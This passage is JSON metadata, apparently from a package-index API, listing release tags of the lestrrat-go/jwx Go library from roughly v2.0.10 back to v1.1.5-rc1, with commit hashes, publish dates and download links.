0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.10/manifests"},{"name":"v2.0.9","sha":"fccc52457a90ce00d625c3ed8d5d3443e903a91b","kind":"commit","published_at":"2023-03-21T03:29:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.9/manifests"},{"name":"v2.0.8","sha":"7803b82f35c80ed24b6d8b730a11983f751904b8","kind":"commit","published_at":"2022-11-25T00:58:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.8/manifests"},{"name":"v2.0.7","sha":"6e8e91832b11d1d13f53b5e0b9a49fcd10db1f27","kind":"commit","published_at":"2022-11-15T01:54:59.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.7/manifests"},{"name":"v2.0.6","sha":"92950642291a3af54c5f1455ec68e76b390587ae","kind":"commit","published_at":"2022-08-25T13:19:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"c599c15c345121b1223fb7a744eaa07fdfe5e95e","kind":"commit","published_at":"2022-08-11T00:18:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"21f292826bf5f4cb76be98dcdfef9ce635835b5e","kind":"commit","published_at":"2022-07-19T05:24:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"650fe90d166ba9ada98474be3b9f6450701ffb71","kind":"commit","published_at":"2022-06-13T12:26:04.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"dc603b6e88971ce0c477c48fd8b77e84ffefb169","kind":"commit","published_at":"2022-05-23T12:58:39.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.2/manifests"},{"name":"v1.2.25","sha":"ad8c29d1628435cdad008b5cbbfbe75f5bfc74ae","kind":"commit","published_at":"2022-05-23T12:48:33.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.25","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.25/manifests"},{"name":"v2.0.1","sha":"0d365e4523faae8e9f3bbcbd5bc3a09cab951d49","kind":"commit","published_at":"2022-05-06T00:39:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.1/manifests"},{"name":"v1.2.24","sha":"e38f677839edbeae5480e993d73eacb94f7af581","kind":"commit","published_at":"2022-05-05T01:00:31.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddae